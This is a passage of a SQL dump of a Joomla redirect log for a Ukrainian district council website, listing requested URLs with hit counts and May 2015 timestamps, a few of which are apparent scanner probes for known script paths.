00:00:00',301),(13434,'http://malyn-rayrada.org.ua/index.php/812-shhodo-oplati-elektroenergii?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-11 06:07:40','0000-00-00 00:00:00',301),(13435,'http://malyn-rayrada.org.ua/index.php/876-sluzhba-bezpeki-informue?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-11 06:08:08','0000-00-00 00:00:00',301),(13436,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11&lang=en&Itemid=0','','','',3,0,'2015-05-11 08:00:15','0000-00-00 00:00:00',301),(13437,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=547:-l-r-2011-2016-&catid=39&Itemid=76&lang=uk','','','',4,0,'2015-05-11 10:22:18','0000-00-00 00:00:00',301),(13438,'http://www.malyn-rayrada.org.ua/index.php/437-malinchani-budte-oberezhnimi-pid-chas-moroziv-i','','','',10,0,'2015-05-11 19:25:49','0000-00-00 00:00:00',301),(13439,'http://www.malyn-rayrada.org.ua/index.php/23-vesna-prijde-lishe-u-20-chislah-kvitnja','','','',25,0,'2015-05-12 03:31:23','0000-00-00 00:00:00',301),(13440,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=482:-2012-2015-&catid=36&Itemid=70&lang=uk','','','',8,0,'2015-05-12 03:51:04','0000-00-00 00:00:00',301),(13441,'http://www.malyn-rayrada.org.ua/index.php/1083-grafik-provedennya-zasidannya-postijnikh-komisij','','','',1,0,'2015-05-12 16:10:39','0000-00-00 00:00:00',301),(13442,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=716:2012-06-14-15-19-24&catid=43:--25072012-&Itemid=82&lang=ru','','','',5,0,'2015-05-12 18:48:54','0000-00-00 00:00:00',301),(13443,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=716:2012-06-14-15-19-24&catid=43:--25072012-&Itemid=82&lang=uk','','','',3,0,'2015-05-13 02:38:01','0000-00-00 00:00:00',301),(13444,'http://www.malyn-rayrada.org.ua/index.php/751-genasambleja-oon-pidtrimala-teritorialnu-cilisnist?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-13 06:36:21','0000-00-00 00:00:00',301),(13445,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=411:-2014-&catid=37&Itemid=72&lang=uk','','','',22,0,'2015-05-13 11:05:10','0000-00-00 00:00:00',301),(13446,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=716:2012-06-14-15-19-24&lang=ru&option=com_content&view=article','','','',3,0,'2015-05-13 18:59:15','0000-00-00 00:00:00',301),(13447,'http://www.malyn-rayrada.org.ua/index.php/253-pro-sklikannja-15-pozachergovoi-sesii-rajonnoi','','','',12,0,'2015-05-13 21:16:13','0000-00-00 00:00:00',301),(13448,'http://malyn-rayrada.org.ua/images/stories/unel.php?baca','','','',8,0,'2015-05-14 13:30:45','0000-00-00 00:00:00',301),(13449,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-05-14 21:59:19','0000-00-00 00:00:00',301),(13450,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&Itemid=14&lang=uk','','','',6,0,'2015-05-14 22:11:18','0000-00-00 00:00:00',301),(13451,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=526:-----2012-&catid=38:--19122011-&Itemid=73&lang=uk','','','',4,0,'2015-05-14 22:24:26','0000-00-00 00:00:00',301),(13452,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=uk','','','',6,0,'2015-05-15 00:36:13','0000-00-00 00:00:00',301),(13453,'http://www.malyn-rayrada.org.ua/magmi/web/magmi.php','','','',1,0,'2015-05-15 01:42:11','0000-00-00 00:00:00',301),(13454,'http://www.malyn-rayrada.org.ua/magmi/web/plugin_upload.php','','','',1,0,'2015-05-15 01:42:14','0000-00-00 00:00:00',301),(13455,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=448:-2011-2012-&catid=38:--19122011-&Itemid=73&lang=uk','','','',3,0,'2015-05-15 06:58:11','0000-00-00 00:00:00',301),(13456,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&Itemid=14&lang=ru','','','',4,0,'2015-05-15 10:22:23','0000-00-00 00:00:00',301),(13457,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2015-05-15 10:28:39','0000-00-00 00:00:00',301),(13458,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2015-05-15 10:40:14','0000-00-00 00:00:00',301),(13459,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2015-05-15 10:51:52','0000-00-00 00:00:00',301),(13460,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=uk','','','',5,0,'2015-05-15 15:00:15','0000-00-00 00:00:00',301),(13461,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=ru&Itemid=','','','',1,0,'2015-05-15 15:04:15','0000-00-00 00:00:00',301),(13462,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=uk&Itemid=','','','',5,0,'2015-05-15 15:06:08','0000-00-00 00:00:00',301),(13463,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=ru&Itemid=0','','','',6,0,'2015-05-15 15:11:24','0000-00-00 00:00:00',301),(13464,'http://www.malyn-rayrada.org.ua/index.php/1019-pro-sklikannya-37-pozachergovoji-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-15 19:14:42','0000-00-00 00:00:00',301),(13465,'http://malyn-rayrada.org.ua/index.php/437-malinchani-budte-oberezhnimi-pid-chas-moroziv-i','','','',2,0,'2015-05-16 04:18:02','0000-00-00 00:00:00',301),(13466,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=909:2013-01-21-10-09-40&catid=36&Itemid=70&lang=ru','','','',3,0,'2015-05-16 05:13:56','0000-00-00 00:00:00',301),(13467,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11&Itemid=14&lang=uk','','','',2,0,'2015-05-16 05:57:12','0000-00-00 00:00:00',301),(13468,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=203:2010-12-15-14-10-45&catid=29&Itemid=60&lang=uk','','','',5,0,'2015-05-16 06:15:05','0000-00-00 00:00:00',301),(13469,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=550:2012-01-26-12-39-51&catid=39&Itemid=76&lang=uk','','','',1,0,'2015-05-16 08:47:49','0000-00-00 00:00:00',301),(13470,'http://malyn-rayrada.org.ua/index.php/848-nachalnik-upravlinnja-derzhzemagentstva-u','','','',4,0,'2015-05-16 09:53:18','0000-00-00 00:00:00',301),(13471,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=57:--15042014-&id=1280:-2014-&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=98&lang=en','','','',1,0,'2015-05-16 10:21:02','0000-00-00 00:00:00',301),(13472,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/746-informacija-granitnenskoi-selishhnoi-radi','','','',25,0,'2015-05-16 10:51:58','0000-00-00 00:00:00',301),(13473,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=16:2010-06-06-10-55-25&id=277:-2010-&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=39&lang=en','','','',1,0,'2015-05-16 14:13:40','0000-00-00 00:00:00',301),(13474,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1291:2014-04-23-11-37-34&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=14&lang=uk','','','',1,0,'2015-05-16 14:14:12','0000-00-00 00:00:00',301),(13475,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=56:--03022014-&id=1211:-2014-&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=97&lang=uk','','','',1,0,'2015-05-16 14:19:06','0000-00-00 00:00:00',301),(13476,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1361:-32-6-&catid=11&lang=en','','','',1,0,'2015-05-16 14:19:53','0000-00-00 00:00:00',301),(13477,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=186:-6-&catid=20&Itemid=42&lang=en','','','',1,0,'2015-05-16 15:25:55','0000-00-00 00:00:00',301),(13478,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=186:-6-&catid=20&Itemid=42&lang=ru','','','',1,0,'2015-05-16 15:25:58','0000-00-00 00:00:00',301),(13479,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=186:-6-&catid=20&Itemid=42&lang=uk','','','',1,0,'2015-05-16 15:26:02','0000-00-00 00:00:00',301),(13480,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=186:-6-&catid=20:2010-06-07-09-15-05&Itemid=42&lang=ru','','','',1,0,'2015-05-16 15:26:09','0000-00-00 00:00:00',301),(13481,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=186:-6-&catid=20:2010-06-07-09-15-05&Itemid=42&lang=uk','','','',1,0,'2015-05-16 15:26:12','0000-00-00 00:00:00',301),(13482,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=198:------------2006-2010-r&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-05-16 15:27:12','0000-00-00 00:00:00',301),(13483,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=200:-----------------2006-2010-&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-05-16 15:27:45','0000-00-00 00:00:00',301),(13484,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=212:2010-12-15-14-49-15&catid=29:--15122010-&Itemid=60&lang=en','','','',1,0,'2015-05-16 15:45:47','0000-00-00 00:00:00',301),(13485,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=212:2010-12-15-14-49-15&catid=29:--15122010-&Itemid=60&lang=ru','','','',2,0,'2015-05-16 15:45:52','0000-00-00 00:00:00',301),(13486,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=212:2010-12-15-14-49-15&catid=29:--15122010-&Itemid=60&lang=uk','','','',6,0,'2015-05-16 15:45:55','0000-00-00 00:00:00',301),(13487,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=276:---4-----6--25032011-&catid=31:-25032011&Itemid=62&lang=en','','','',1,0,'2015-05-16 15:48:23','0000-00-00 00:00:00',301),(13488,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=276:---4-----6--25032011-&catid=31:-25032011&Itemid=62&lang=ru','','','',1,0,'2015-05-16 15:48:27','0000-00-00 00:00:00',301),(13489,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16&Itemid=39&lang=en','','','',1,0,'2015-05-16 15:48:33','0000-00-00 00:00:00',301),(13490,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16&Itemid=39&lang=ru','','','',1,0,'2015-05-16 15:48:36','0000-00-00 00:00:00',301),(13491,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16&Itemid=39&lang=uk','','','',5,0,'2015-05-16 15:48:39','0000-00-00 00:00:00',301),(13492,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16:2010-06-06-10-55-25&Itemid=39&lang=en','','','',1,0,'2015-05-16 15:48:42','0000-00-00 00:00:00',301),(13493,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16:2010-06-06-10-55-25&Itemid=39&lang=ru','','','',1,0,'2015-05-16 15:48:45','0000-00-00 00:00:00',301),(13494,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16:2010-06-06-10-55-25&Itemid=39&lang=uk','','','',4,0,'2015-05-16 15:48:48','0000-00-00 00:00:00',301),(13495,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=448:-2011-2012-&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-05-16 15:54:22','0000-00-00 00:00:00',301),(13496,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=465:-l-r-2011-&catid=38&Itemid=73&lang=uk','','','',48,0,'2015-05-16 15:54:35','0000-00-00 00:00:00',301),(13497,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=480:2011-11-28-10-11-58&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-05-16 15:55:00','0000-00-00 00:00:00',301),(13498,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=510:-2011-&catid=38:--19122011-&Itemid=73&lang=uk','','','',2,0,'2015-05-16 15:56:52','0000-00-00 00:00:00',301),(13499,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=38&Itemid=73&lang=en','','','',2,0,'2015-05-16 15:56:55','0000-00-00 00:00:00',301),(13500,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=520:-2012-2013-&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-05-16 15:58:00','0000-00-00 00:00:00',301),(13501,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1162:2013-12-19-06-13-29&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=14&lang=uk','','','',1,0,'2015-05-16 17:48:35','0000-00-00 00:00:00',301),(13502,'http://malyn-rayrada.org.ua/index.php/257-do-vidoma-vlasnikiv-avto','','','',2,0,'2015-05-16 17:51:45','0000-00-00 00:00:00',301),(13503,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=29:--15122010-&id=212:2010-12-15-14-49-15&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=60&lang=en','','','',1,0,'2015-05-16 18:20:13','0000-00-00 00:00:00',301),(13504,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=765:-qq&tmpl=component&print=1&layout=default&page=&lang=uk','','','',1,0,'2015-05-16 18:21:08','0000-00-00 00:00:00',301),(13505,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1284:2014-04-17-13-00-18&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=14&lang=uk','','','',1,0,'2015-05-16 18:23:47','0000-00-00 00:00:00',301),(13506,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=58:--30042014-&id=1299:-lr-&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=70&lang=uk','','','',1,0,'2015-05-16 22:14:06','0000-00-00 00:00:00',301),(13507,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=55:--26122013-&id=1168:2014-01-08-07-14-14&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=96&lang=en','','','',1,0,'2015-05-16 22:14:40','0000-00-00 00:00:00',301),(13508,'http://www.malyn-rayrada.org.ua/index.php?Itemid=42&catid=20:2010-06-07-09-15-05&id=186:-6-&lang=en&option=com_content&view=article','','','',4,0,'2015-05-16 23:38:54','0000-00-00 00:00:00',301),(13509,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=510:-2011-&lang=ru&option=com_content&view=article','','','',4,0,'2015-05-17 00:37:53','0000-00-00 00:00:00',301),(13510,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=738:-c-&catid=43:--25072012-&Itemid=82&lang=en','','','',1,0,'2015-05-17 01:33:54','0000-00-00 00:00:00',301),(13511,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=738:-c-&catid=43:--25072012-&Itemid=82&lang=ru','','','',1,0,'2015-05-17 01:34:11','0000-00-00 00:00:00',301),(13512,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=738:-c-&catid=43:--25072012-&Itemid=82&lang=uk','','','',1,0,'2015-05-17 01:34:14','0000-00-00 00:00:00',301),(13513,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=746:-2012-&catid=43:--25072012-&Itemid=82&lang=uk','','','',1,0,'2015-05-17 01:39:16','0000-00-00 00:00:00',301),(13514,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=ru','','','',1,0,'2015-05-17 01:39:55','0000-00-00 00:00:00',301),(13515,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=uk','','','',1,0,'2015-05-17 01:40:05','0000-00-00 00:00:00',301),(13516,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-05-17 01:40:22','0000-00-00 00:00:00',301),(13517,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11&lang=uk','','','',1,0,'2015-05-17 01:41:17','0000-00-00 00:00:00',301),(13518,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=756:-2012-&catid=44&Itemid=83&lang=uk','','','',1,0,'2015-05-17 01:41:34','0000-00-00 00:00:00',301),(13519,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=756:-2012-&catid=44:--12092012-&Itemid=83&lang=en','','','',1,0,'2015-05-17 01:41:44','0000-00-00 00:00:00',301),(13520,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=756:-2012-&catid=44:--12092012-&Itemid=83&lang=ru','','','',1,0,'2015-05-17 01:42:03','0000-00-00 00:00:00',301),(13521,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=756:-2012-&catid=44:--12092012-&Itemid=83&lang=uk','','','',1,0,'2015-05-17 01:42:07','0000-00-00 00:00:00',301),(13522,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=757:2012-09-12-09-47-49&catid=44&Itemid=83&lang=uk','','','',1,0,'2015-05-17 01:42:11','0000-00-00 00:00:00',301),(13523,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=757:2012-09-12-09-47-49&catid=44:--12092012-&Itemid=83&lang=en','','','',1,0,'2015-05-17 01:42:14','0000-00-00 00:00:00',301),(13524,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=757:2012-09-12-09-47-49&catid=44:--12092012-&Itemid=83&lang=ru','','','',1,0,'2015-05-17 01:42:17','0000-00-00 00:00:00',301),(13525,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=757:2012-09-12-09-47-49&catid=44:--12092012-&Itemid=83&lang=uk','','','',3,0,'2015-05-17 01:42:36','0000-00-00 00:00:00',301),(13526,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=758:--15---&catid=11&lang=en','','','',1,0,'2015-05-17 01:43:15','0000-00-00 00:00:00',301),(13527,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=758:--15---&catid=11&lang=ru','','','',1,0,'2015-05-17 01:43:25','0000-00-00 00:00:00',301),(13528,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=758:--15---&catid=11&lang=uk','','','',1,0,'2015-05-17 01:43:40','0000-00-00 00:00:00',301),(13529,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11&lang=uk','','','',1,0,'2015-05-17 01:47:32','0000-00-00 00:00:00',301),(13530,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=en','','','',1,0,'2015-05-17 01:50:27','0000-00-00 00:00:00',301),(13531,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=en&Itemid=','','','',1,0,'2015-05-17 01:50:30','0000-00-00 00:00:00',301),(13532,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=uk','','','',1,0,'2015-05-17 01:50:32','0000-00-00 00:00:00',301),(13533,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=787:2012-10-15-09-13-25&catid=45&Itemid=84&lang=uk','','','',3,0,'2015-05-17 01:51:06','0000-00-00 00:00:00',301),(13534,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=792:2012-10-17-06-26-37&catid=45&Itemid=84&lang=uk','','','',1,0,'2015-05-17 01:52:28','0000-00-00 00:00:00',301),(13535,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-l-r&catid=45&Itemid=84&lang=uk','','','',1,0,'2015-05-17 01:54:48','0000-00-00 00:00:00',301),(13536,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=817:---------------l--r&catid=45&Itemid=84&lang=en','','','',4,0,'2015-05-17 02:00:02','0000-00-00 00:00:00',301),(13537,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=817:---------------l--r&catid=45&Itemid=84&lang=ru','','','',1,0,'2015-05-17 02:06:42','0000-00-00 00:00:00',301),(13538,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=817:---------------l--r&catid=45&Itemid=84&lang=uk','','','',1,0,'2015-05-17 02:06:50','0000-00-00 00:00:00',301),(13539,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=817:---------------l--r&catid=45:--14112012-&Itemid=84&lang=uk','','','',1,0,'2015-05-17 02:06:54','0000-00-00 00:00:00',301),(13540,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11&lang=en','','','',1,0,'2015-05-17 02:11:02','0000-00-00 00:00:00',301),(13541,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11&lang=en','','','',1,0,'2015-05-17 02:11:36','0000-00-00 00:00:00',301),(13542,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11&lang=ru','','','',1,0,'2015-05-17 02:11:39','0000-00-00 00:00:00',301),(13543,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1361:-32-6-&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=1&lang=en','','','',1,0,'2015-05-17 02:21:29','0000-00-00 00:00:00',301),(13544,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=44:--12092012-&id=756:-2012-&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=83&lang=en','','','',1,0,'2015-05-17 02:24:05','0000-00-00 00:00:00',301),(13545,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=43:--25072012-&id=738:-c-&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=82&lang=uk','','','',1,0,'2015-05-17 02:24:08','0000-00-00 00:00:00',301),(13546,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=708:-l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2015-05-17 07:39:52','0000-00-00 00:00:00',301),(13547,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=763:2012-09-24-07-57-43&lang=ru&option=com_content&view=article','','','',1,0,'2015-05-17 10:23:06','0000-00-00 00:00:00',301),(13548,'http://malyn-rayrada.org.ua/domain/domaintransfer/','','','',1,0,'2015-05-17 14:11:48','0000-00-00 00:00:00',301),(13549,'http://malyn-rayrada.org.ua/unix/expert/','','','',1,0,'2015-05-17 14:11:57','0000-00-00 00:00:00',301),(13550,'http://malyn-rayrada.org.ua/contacts/','','','',1,0,'2015-05-17 14:12:00','0000-00-00 00:00:00',301),(13551,'http://malyn-rayrada.org.ua/unix/big/','','','',1,0,'2015-05-17 14:12:01','0000-00-00 00:00:00',301),(13552,'http://malyn-rayrada.org.ua/cluster/cspec','','','',1,0,'2015-05-17 14:12:04','0000-00-00 00:00:00',301),(13553,'http://malyn-rayrada.org.ua/servers/collocation/','','','',1,0,'2015-05-17 14:12:05','0000-00-00 00:00:00',301),(13554,'http://malyn-rayrada.org.ua/hosting/moneyback/','','','',1,0,'2015-05-17 14:12:06','0000-00-00 00:00:00',301),(13555,'http://malyn-rayrada.org.ua/cluster/cmaximum','','','',1,0,'2015-05-17 14:12:11','0000-00-00 00:00:00',301),(13556,'http://malyn-rayrada.org.ua/bay.php?p=cluster&month=12&action=cluster','','','',1,0,'2015-05-17 14:12:12','0000-00-00 00:00:00',301),(13557,'http://malyn-rayrada.org.ua/windows/','','','',1,0,'2015-05-17 14:12:13','0000-00-00 00:00:00',301),(13558,'http://malyn-rayrada.org.ua/unix/vizitka/','','','',1,0,'2015-05-17 14:12:16','0000-00-00 00:00:00',301),(13559,'http://malyn-rayrada.org.ua/about/servers/','','','',1,0,'2015-05-17 14:12:19','0000-00-00 00:00:00',301),(13560,'http://malyn-rayrada.org.ua/unix/vigodniy/','','','',1,0,'2015-05-17 14:12:20','0000-00-00 00:00:00',301),(13561,'http://malyn-rayrada.org.ua/bay/','','','',1,0,'2015-05-17 14:12:22','0000-00-00 00:00:00',301),(13562,'http://malyn-rayrada.org.ua/faq/','','','',1,0,'2015-05-17 14:12:23','0000-00-00 00:00:00',301),(13563,'http://malyn-rayrada.org.ua/map/','','','',1,0,'2015-05-17 14:12:25','0000-00-00 00:00:00',301),(13564,'http://malyn-rayrada.org.ua/resseler/domain/','','','',1,0,'2015-05-17 14:12:30','0000-00-00 00:00:00',301),(13565,'http://malyn-rayrada.org.ua/google/','','','',1,0,'2015-05-17 14:12:33','0000-00-00 00:00:00',301),(13566,'http://malyn-rayrada.org.ua/hosting/','','','',1,0,'2015-05-17 14:12:36','0000-00-00 00:00:00',301),(13567,'http://malyn-rayrada.org.ua/resseler/designer/','','','',1,0,'2015-05-17 14:12:34','0000-00-00 00:00:00',301),(13568,'http://malyn-rayrada.org.ua/service/index/add/antispamdrweb/','','','',1,0,'2015-05-17 14:12:45','0000-00-00 00:00:00',301),(13569,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=200:-----------------2006-2010-&catid=29&Itemid=60&lang=ru','','','',4,0,'2015-05-17 15:46:55','0000-00-00 00:00:00',301),(13570,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&Itemid=14&lang=ru','','','',2,0,'2015-05-17 23:32:02','0000-00-00 00:00:00',301),(13571,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&lang=ru','','','',1,0,'2015-05-17 23:32:20','0000-00-00 00:00:00',301),(13572,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&lang=uk','','','',1,0,'2015-05-17 23:32:24','0000-00-00 00:00:00',301),(13573,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&lang=ru','','','',1,0,'2015-05-17 23:32:28','0000-00-00 00:00:00',301),(13574,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1290:2014-04-23-06-56-41&Itemid=17&lang=uk','','','',1,0,'2015-05-17 23:32:30','0000-00-00 00:00:00',301),(13575,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&Itemid=14&lang=en','','','',1,0,'2015-05-17 23:32:32','0000-00-00 00:00:00',301),(13576,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1288:2014-04-23-06-50-40&Itemid=17&lang=ru','','','',1,0,'2015-05-17 23:32:36','0000-00-00 00:00:00',301),(13577,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&Itemid=14&lang=ru','','','',1,0,'2015-05-17 23:32:55','0000-00-00 00:00:00',301),(13578,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1290:2014-04-23-06-56-41&Itemid=17&lang=en','','','',1,0,'2015-05-17 23:33:02','0000-00-00 00:00:00',301),(13579,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1289:2014-04-23-06-53-01&Itemid=17&lang=ru','','','',1,0,'2015-05-17 23:33:03','0000-00-00 00:00:00',301),(13580,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1289:2014-04-23-06-53-01&Itemid=17&lang=uk','','','',1,0,'2015-05-17 23:33:22','0000-00-00 00:00:00',301),(13581,'http://www.malyn-rayrada.org.ua/index.php/812-shhodo-oplati-elektroenergii','','','',7,0,'2015-05-17 23:33:23','0000-00-00 00:00:00',301),(13582,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&Itemid=14&lang=en','','','',1,0,'2015-05-17 23:33:26','0000-00-00 00:00:00',301),(13583,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&Itemid=14&lang=uk','','','',1,0,'2015-05-17 23:33:28','0000-00-00 